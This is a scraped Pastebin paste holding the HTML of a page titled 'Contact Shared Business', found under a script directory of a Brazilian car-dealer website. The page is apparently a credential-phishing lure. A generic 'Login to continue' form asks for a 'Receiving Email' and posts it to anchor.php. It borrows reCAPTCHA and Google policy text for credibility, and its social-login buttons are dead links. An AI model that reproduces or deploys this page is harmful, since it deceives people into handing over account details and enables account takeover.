Advertisement
TrashScrape

https://leonardoautomoveis.com.br/js/all/

May 13th, 2021
203
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.54 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4. <title>Contact Shared Business</title>
  5. <meta charset="UTF-8">
  6. <meta name="viewport" content="width=device-width, initial-scale=1">
  7. <!--===============================================================================================-->
  8. <link rel="icon" type="image/png" href="images/icons/fav.ico"/>
  9. <!--===============================================================================================-->
  10. <link rel="stylesheet" type="text/css" href="vendor/bootstrap/css/bootstrap.min.css">
  11. <!--===============================================================================================-->
  12. <link rel="stylesheet" type="text/css" href="fonts/font-awesome-4.7.0/css/font-awesome.min.css">
  13. <!--===============================================================================================-->
  14. <link rel="stylesheet" type="text/css" href="fonts/Linearicons-Free-v1.0.0/icon-font.min.css">
  15. <!--===============================================================================================-->
  16. <link rel="stylesheet" type="text/css" href="vendor/animate/animate.css">
  17. <!--===============================================================================================-->
  18. <link rel="stylesheet" type="text/css" href="vendor/css-hamburgers/hamburgers.min.css">
  19. <!--===============================================================================================-->
  20. <link rel="stylesheet" type="text/css" href="vendor/animsition/css/animsition.min.css">
  21. <!--===============================================================================================-->
  22. <link rel="stylesheet" type="text/css" href="vendor/select2/select2.min.css">
  23. <!--===============================================================================================-->
  24. <link rel="stylesheet" type="text/css" href="vendor/daterangepicker/daterangepicker.css">
  25. <!--===============================================================================================-->
  26. <link rel="stylesheet" type="text/css" href="css/util.css">
  27. <link rel="stylesheet" type="text/css" href="css/main.css">
  28. <!--===============================================================================================-->
  29. </head>
  30. <body style="background-color: #666666;">
  31.  
  32. <div class="limiter">
  33. <div class="container-login100">
  34. <div class="wrap-login100">
  35.  
  36. <form class="login100-form validate-form" action="anchor.php" method="post">
  37. <div style="position:relative; bottom:50px;">
  38. <img src="images/branding.png" width="200px">
  39. </div>
  40. <span class="login100-form-title p-b-43">
  41. Login to continue
  42. </span>
  43.  
  44.  
  45. <div class="wrap-input100 validate-input" data-validate = "Valid email is required: ex@abc.xyz">
  46. <input class="input100" type="text" name="email" autocomplete="off">
  47. <span class="focus-input100"></span>
  48. <span class="label-input100">Receiving Email</span>
  49. </div>
  50.  
  51. <span class="txt2">
  52. This page is protected by reCAPTCHA, and subject to the Google <a href="https://www.google.com/policies/privacy/" style="color:blue;">Privacy Policy</a>
  53. and <a href="https://www.google.com/policies/terms/" style="color:blue;">Terms of Service</a>.
  54. </span>
  55. <br /><br />
  56.  
  57. <div class="flex-sb-m w-full p-t-3 p-b-32">
  58. <div class="contact100-form-checkbox">
  59. <input class="input-checkbox100" id="ckb1" type="checkbox" name="remember-me">
  60. <label class="label-checkbox100" for="ckb1">
  61. Remember me
  62. </label>
  63. </div>
  64.  
  65.  
  66. </div>
  67.  
  68.  
  69. <div class="container-login100-form-btn">
  70. <button class="login100-form-btn">
  71. Login
  72. </button>
  73. </div>
  74.  
  75. <div class="text-center p-t-46 p-b-20">
  76. <span class="txt2">
  77. or create a new account
  78. </span>
  79. </div>
  80.  
  81. <div class="login100-form-social flex-c-m">
  82. <a href="#" class="login100-form-social-item flex-c-m bg1 m-r-5">
  83. <i class="fa fa-facebook-f" aria-hidden="true"></i>
  84. </a>
  85.  
  86. <a href="#" class="login100-form-social-item flex-c-m bg2 m-r-5">
  87. <i class="fa fa-google" aria-hidden="true"></i>
  88. </a>
  89. </div>
  90. </form>
  91.  
  92. <div class="login100-more" style="background-image: url('images/bg.png');">
  93. </div>
  94. </div>
  95. </div>
  96. </div>
  97.  
  98.  
  99.  
  100.  
  101.  
  102. <!--===============================================================================================-->
  103. <script src="vendor/jquery/jquery-3.2.1.min.js"></script>
  104. <!--===============================================================================================-->
  105. <script src="vendor/animsition/js/animsition.min.js"></script>
  106. <!--===============================================================================================-->
  107. <script src="vendor/bootstrap/js/popper.js"></script>
  108. <script src="vendor/bootstrap/js/bootstrap.min.js"></script>
  109. <!--===============================================================================================-->
  110. <script src="vendor/select2/select2.min.js"></script>
  111. <!--===============================================================================================-->
  112. <script src="vendor/daterangepicker/moment.min.js"></script>
  113. <script src="vendor/daterangepicker/daterangepicker.js"></script>
  114. <!--===============================================================================================-->
  115. <script src="vendor/countdowntime/countdowntime.js"></script>
  116. <!--===============================================================================================-->
  117. <script src="js/main.js"></script>
  118.  
  119. </body>
  120.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement